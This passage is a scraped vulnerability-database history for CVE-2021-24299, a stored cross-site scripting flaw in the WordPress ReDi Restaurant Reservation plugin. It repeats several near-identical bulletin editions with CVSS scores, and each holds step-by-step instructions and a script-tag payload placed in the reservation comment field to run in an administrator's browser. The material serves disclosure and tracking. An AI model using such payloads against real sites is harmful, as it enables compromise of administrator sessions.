https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-23T22:37:55", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "6ead36ff295ac9801b099b3475f40dad", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-25T00:46:40", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-25] #"}, "lastseen": "2021-09-25T00:46:40", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "e736003a920315fe4183e4fee377b474", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-25T22:39:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-26] #"}, "lastseen": "2021-09-25T22:39:25", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "8ec7db927501f3d15d33a694525072a2", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-26T22:45:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-27] #"}, "lastseen": "2021-09-26T22:45:52", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "f0734304360c2f1fa39d5bc642247d6a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-28T06:43:52", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-28] #"}, "lastseen": "2021-09-28T06:43:52", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "eaa960d2c24747f2ef01986ac3a7de62", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-28T22:45:56", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:45:56", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "7dcad9c725872f0dadbf915339660d3a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-29T22:51:22", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:51:22", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "fc4fafd7d55d18bf4caae14a3ac2b3cf", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-01T00:44:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-10-01T00:44:30", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "dc8909861924e4ee8ef3ec627cf54ce1", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-01T22:52:00", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-25T00:46:40", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-25T00:46:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-10-02] #"}, "lastseen": "2021-10-01T22:52:00", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "b00f5255fd27dfbef4d3c1ca6aa22c91", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-02T22:41:27", "history": [], "viewCount": 